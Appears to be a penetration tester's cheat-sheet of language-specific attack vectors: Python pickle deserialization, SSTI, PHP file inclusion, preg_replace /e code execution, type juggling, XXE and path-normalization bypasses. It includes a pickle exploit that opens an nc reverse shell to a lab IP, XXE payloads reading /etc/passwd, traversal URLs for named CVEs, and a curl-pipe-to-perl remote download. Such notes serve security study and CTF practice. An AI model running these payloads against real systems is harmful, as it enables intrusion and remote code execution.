Skip to content

Languages

Esoteric Languages

.Net

C / C++

  • Unsafe functions
    • strcpy
    • strcat

GO

Environment Setup

References

Java

  • Decompiler: https://github.com/skylot/jadx
  • Simple steps to create Jar 
    javac -source 1.8 -target 1.8 test.java
mkdir META-INF
echo "Main-Class: test" > META-INF/MANIFEST.MF
jar cmvf META-INF/MANIFEST.MF test.jar test.class
java -jar test.jar
  • Debug 
    -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8787,server=y ,suspend=n
jdb -attach example:8787
jdb -sourcepath . -attach example:8787 # jdb with the sourcepath
stop in <full package>.<class>.<method>
list

# add to tomcat-verison/bin/startup.sh
export JPDA_ADDRESS=8000
export JPDA_TRANSPORT=dt_socket

# modify last line to
exec "$PRGDIR"/"$EXECUTABLE" jpda start "$@"

Deserialization

References

New Technologies

JavaScript

Tools

NodeJS / JavaScript

  • Look for eval()

Tools

References

Rails

RegEx

References

Rust

References

Python

SSTI

  • Searching: 
    c = 'HELLO'.__class__.__base__.__subclasses__()

for i in range(len(c)):
  print( i, c[i].__name__ )

for i in range(len(c)):
  n = c[i].__name__
  if n.find('warning') > -1: # Find specific function name
    print( i, n )

Challenges

Tools

  • ZipApps - similar to JAR
  • pipX - pip with virtual env
  • Shiv - Modified ZipApp to work with C extensions
  • Packaging: The bible of packaging python apps in docker

Attack Vectors - Exploiting Imports - It is possible to create a .py file named with the name of the import. This will load the local file (same dir as the file importing the library) instead of the actual library. - cPickle RCE - Arbitrary code execution with Python pickles - Python Pickle Injection - https://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/ - https://blog.nelhage.com/2011/03/exploiting-pickle/ - https://stackoverflow.com/questions/38307636/can-anyone-explain-me-the-example-of-an-exploit-in-python-s-pickle-module - HTB - DevOps - HTB - Challenge - Mics - Long Bottom's Locker - https://www.hackingnote.com/en/python-challenge-solutions/level-5 - Pickle formats: http://spootnik.org/entries/2014/04/05/diving-into-the-python-pickle-formatt/index.html

#!/usr/bin/python3
import sys
import pickle

f = open(sys.argv[1], 'rb')
mydict = pickle.load(f)
f.close

for line in mydict:
    print("".join([k * v for k, v in line]))

for i in mydict:
    b=[]
    for x in i:
        #print x
        b.append(x[0] * x[1])

    print("".join(b))

import cPickle, requests, base64

LHOST = '10.10.14.14'
LPORT = '31337'
RHOST = '10.10.10.91'
RPORT = '5000'


class Payload(object):
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        import os
        return (os.system, (self.cmd,))


reverse_sh = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f" % (LHOST, LPORT)
evilpickle = cPickle.dumps(Payload(reverse_sh))

r = requests.post('http://%s:%s/newpost' % (RHOST, RPORT), data=base64.urlsafe_b64encode(evilpickle))
print('POST {} {}'.format(r.status_code, r.url))

Pickle to object:

import pickle
import base64 
pickled = base64.b64decode("Value")
pickle.load(pickled)

PHP

  • Extensions: .php .php3 .php4 .php5 .php7 .phps .phtml .inc .phar

Cheatsheets

References

Attack Vectors

Terminate strings using null byte**

Before PHP 5.3 terminate strings using null byte is possible (%00 in URL)

http://example.com?param=../../../../etc/passed
  -> /etc/passed.php
http://example.com?param=../../../../etc/passed%00
  -> /etc/passed

Vulnerable Functions

Local / Remote file inclusion bugs: 

include()
include_once()
require()
require_once()

Local / Remote command execution bugs: 

eval()
preg_replace()
fwrite()
passthru()
file_get_contents()
shell_exec()
system()

SQL Injection bugs: 

mysql_query()

File / File system bugs: 

fopen()
readfile()
glob()
file()
popen()
exec()

https://0xzoidberg.wordpress.com/2010/05/26/vulnerable-php-functions/

RCE with PREG Functions

  • implement regular expressions for the preg_ functions (preg_match, preg_replace)
  • /e modifier which allows evaluation of PHP code in the preg_replace

Example:

<?php
$string = "this is my lower sting";
print preg_replace('/(.*)/e', 'strtoupper("\\1")', '$string');
?>

// THIS IS MY LOWER STING

Example Attack: 

<?php
$string = "phpinfo()";
print preg_replace('/^(.*)/e', 'strtoupper(\\1)', $string);
?>

Filter Evasion: - Prevent single quote and escape chars

Following will fail: $string = "system('ls -lah')";

Bypass: $string = "`ls -lah`";

LFI with Filter Inclusion

LFI with Zip Inclusion (Include a file inside a zip)

LFI to RFI

  • Possible if allow_url_include is on

Type Juggling

Fixed in v7 (except for exponent) References:

1558284487209

'0e1234' == '0e4321'
'0e1234' == '0'
'0e1234' <= '1'
'0xf' == '15' #0xf in hexadecimal notation is 15

'000...000' == int(0)
'0e0...000' == int(0)
'1e0...000' == int(1)
'0abc...000' == int(0)
'abc...000' == int(0) # if a string starts with a non numerical character it will default to int(0)

var_dump("2 bottles" == 2); // ==> TRUE

$values = array("apple","orange","pear","grape"); in_array(0, $values); // ==> TRUE

if($password == "secretpass") // ==> TRUE when $password=0

Example: 

<php
  $token = "0e124656823434657657655654324342";
  if(isset($_COOKIE['token']) && $_COOKIE['token'] == $token) {
    // access to privilege area
  }
  else {
    // login require
  }
?>

$COOKIE[‘token’] == $token (‘0e124656823434657657655654324342’ == ‘0’) will return TRUE
$COOKIE[‘token’] != $token (‘0e124656823434657657655654324342’ != ‘0’) will return FALSE

var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs')  == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2'         == '1e3');
var_dump('0x1234Ab'       == '1193131');
var_dump('0xABCdef'       == '     0xABCdef');
MD5 
var_dump(md5('240610708') == md5('QNKCDZO'));
0e462097431906509019562988736854 == 0e830400451993494058024219903391
SHA1 
0e07766915004133176347055865026311692244


def find_email_with_juggle_md5(domain, max_prefix_length, hash_split_length):
    count = 0
    for check in itertools.imap(''.join, itertools.product(string.lowercase, repeat=int(max_prefix_length))):
        hash = hashlib.md5("%s@%s" % (check, domain)).hexdigest()
        if hash_split_length > 0:
            hash =  hash[:hash_split_length]
        if re.match(r'0+[eE]\d+$', hash):
            print "(+) Found %s@%s, with  %d attempts (hash: %s)" % (check, domain, count, hash)
    count += 1

Reduction in Entropy (Insecure HMAC)

$secret = 'secure_random_secret_value'; $hmac = md5($secret . $_POST['message']); if($hmac == $_POST['hmac'])<br>
// ===> Bypass by creating a hmac starting with `0e[0-9]` // var_dump("0e123" == "0e51217526859264863"); ===> TRUE shell_exec($_POST['message']);

Hashing Algorithm Disclosure

Given 240610708 and QNKCDZO attacker can guess that hashing algo is md5

var_dump(md5('240610708') == md5('QNKCDZO')); ===> TRUE

XML

  • Internal entity: <!--ENTITY name "entity_value"-->
    • <!--ENTITY test "<value-->test</value>"> 
      <?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name "Replaced">
]>
<root>
    <t1>&name;</t1>
</root>
  • External entity:
    • Private: <!--ENTITY name SYSTEM "URI"-->
      • <!--ENTITY example SYSTEM "http://example.com/example.xml"-->
    • Public: <!--ENTITY name PUBLIC "public_id" "URI"-->
      • <!--ENTITY example PUBLIC "-//W3C//TEXT examples//EN" "http://example.com/example.xml"--> 
        <?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<root>
    <t1>&name;</t1>
</root>
  • Parameter Entity: <!--ENTITY % name SYSTEM "URI"-->
    • <!--ENTITY % test 'Example'--><!--ENTITY Title 'This is %test;' -->
  • Unparsed:
    • <!--ENTITY name SYSTEM "URI" NDATA TYPE-->
    • <!--ENTITY name PUBLIC "public_id" "URI" NDATA TYPE-->
  • CDATA
    • It's not possible to ref to entity from another entity within the DTD defining those
    • Hence, need external DTD: echo '<!--ENTITY wrapper "%start;%content;%end;"-->' > wrapper.dtd 
      <?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % content SYSTEM "file:///example/example.xml" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://example/wrapper.dtd" >
%dtd;
]>
<root>
    <t1>&wrapper;</t1>
</root>

Breaking Parsers

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • new URL("file:///etc/passwd?/../../Windows/win.ini")
    • Windows: UNC: //etc/passwd?/../../Windows/win.ini
    • Linux: URL: file:///etc/passwd
  • replace v.s. replaceAll
  • ..\Q/\E is the new ../ in Grails
  • /app/static/ v.s. /app/static
    • Nginx:
    • location /static { alias /home/app/static/; }
    • In: http://127.0.0.1/static../settings.py
    • Out: /home/app/static/../settings.py 
      200 http://target/assets/app.js
403 http://target/assets/
404 http://target/assets/../settings.py
403 http://target/assets../
200 http://target/assets../static/app.js
200 http://target/assets../settings.py
  • Spring 0day - CVE-2018-1271
    • http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini
  • Spark framework CVE-2018-9159
    • Same as Spring
  • Rails 0day - CVE-2018-3760
    • Affected Rails under development environment
    • Or production mode with flag assets.compile on
    • Vuln
      • Sprockets supports file:// scheme that bypassed absolute_path?
      • URL decode bypassed double slashes normalization
      • Method split_file_uri resolved URI and unescape again
      • Lead to double encoding and bypass forbidden_request? and prefix check
    • http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/etc/passwd
    • RCE:
      • Inject query string %3F to File URL
      • Render as ERB template if the extension is .erb
      • http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images/%252e%252e/%252e%252e/%252e%252e/tmp/evil.erb%3ftype=text/plain
  • URL path parameter
    • if you are using reverse proxy with Java as backend service
    • http://example.com/foo;name=orange/bar/
    • Bypass whitelist and blacklist ACL
    • Escape from context mapping
    • http://example.com/portal/..;/manager/html
      • Tomcat thinks it should look at parent directory
    • Example:
      • Uber disallow direct access *.uberinternal.com
      • Whitelisted API: https://jira.uberinternal.com/status
      • Attack: https://jira.uberinternal.com/status/..;/secure/Dashboard.jspa
        • Nginx: /..;/ seems to be a directory with the /status whitelist. Pass to you!
        • Tomcat: /..;/ is the parent directory
    • Inconsistency to ACL bypass
      • Changing the 404 template file to
        • /railo-context/../logs/exception.log
      • curl https://login.getbynder.com/..;/railo-context/foo.cfm -d 'SHELL=-c "curl orange.tw/bc.pl | perl -"'